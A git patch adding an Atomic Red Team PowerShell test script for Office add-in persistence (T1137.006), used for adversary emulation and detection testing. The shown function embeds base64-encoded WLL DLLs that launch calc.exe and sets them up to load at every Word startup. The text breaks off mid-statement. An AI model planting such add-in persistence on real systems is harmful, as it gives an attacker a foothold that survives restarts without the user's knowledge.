From 8d5a230f6fca152391fc8a05bdfb60cd3b371675 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 2 Jan 2023 19:47:50 -0500 Subject: [PATCH] new Office Persistence with add-ins atomics --- atomics/T1137.006/src/OfficePersistence.ps1 | 151 ++++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 atomics/T1137.006/src/OfficePersistence.ps1 diff --git a/atomics/T1137.006/src/OfficePersistence.ps1 b/atomics/T1137.006/src/OfficePersistence.ps1 new file mode 100644 index 00000000..b94838bf --- /dev/null +++ b/atomics/T1137.006/src/OfficePersistence.ps1 @@ -0,0 +1,151 @@ +<# +.SYNOPSIS +This script allows you to test Office-based persistence methods mentioned in 《add-in-opportunities-for-office-persistence》. +Support methods: +- WLL "Add-Ins" for Word +- XLL "Add-Ins" for Excel +- VBA add-ins for Excel +- VBA add-ins for PowerPoint + +Author: 3gstudent@3gstudent (slightly modified by clr2of8 to handle 64bit correctly January 2023 for use in Atomic Red Team) +Office-based persistence method Author: William Knowles@william_knows +Link:https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ +License: BSD 3-Clause + +Can be used to maintain persistence by Word, Excel and Powerpoint. +Test success on Office 2010 and Office 2013. +More to test. +#> + +Function WordWLL +{ + # Use WLL "Add-Ins" for Word + # Release file: %appdata%\Roaming\Microsoft\Word\Startup\calc.wll + # Pop up the calculator when you start winword.exe + $calcwllx86 = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY2FsYy5leGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA0AAAACjAQMCowMjA4MEMwUDBYMGYwazBwMHUwgDCNMJcwrDC4ML4w4DDyME4xajEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + $calcwllx64 = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKi3y2ZKwAAzV0g0mbU////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAACQQAAAwIwAAQBAAAF8QAACIIgAAYBAAAL4QAACoIgAAwBAAAAsTAACMIgAADBMAAEkTAAD0IgAATBMAAIIUAACwIgAAhBQAAM0UAACoIgAA0BQAAKEVAAAEIwAAABYAAE0WAAAMIwAAgBYAAM4WAACoIgAA0BYAAIAXAAA4IwAAgBcAAJcXAAAwIwAAmBcAAFAYAABYIwAAUBgAAIgYAABkIwAAiBgAAMAYAABkIwAAIBkAAEUZAADsIgAARRkAAF8ZAADsIgAAYBkAAIAZAADsIgAAgBkAAJsZAADsIgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAGAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAgAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAAAfQEAAAAAAAAAAAAAAAAAAAAAAAA8P3htbCB2ZXJzaW9uPScxLjAnIGVuY29kaW5nPSdVVEYtOCcgc3RhbmRhbG9uZT0neWVzJz8+DQo8YXNzZW1ibHkgeG1sbnM9J3VybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxJyBtYW5pZmVzdFZlcnNpb249JzEuMCc+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSdhc0ludm9rZXInIHVpQWNjZXNzPSdmYWxzZScgLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+DQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAUAAAA+KAAoVChWKHIoQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + Try + { + $wdApp = New-Object -COMObject "Word.Application" + } + Catch + { + Write-Host "[!] I can't find Microsoft Office!" + Write-Host "[+] Please reset a correct path." + return + } + $fileContent = $calcwllx86 + if ([IntPtr]::Size -eq 8) + { + Write-Host "[+] OS: x64" + if(-not $wdApp.path.contains("Program Files (x86)")) + { + Write-Host "[+] Microsoft Office bit: 64-bit; copying calcwllx64.wll" + $fileContent = $calcwllx64 + } + else + { + Write-Host "[+] Microsoft Office bit: 32-bit; copying calcwllx86.wll" + } + } + else + { + Write-Host "[+] OS: x86; copying calc_x86.wll" + } + $fileContentBytes = 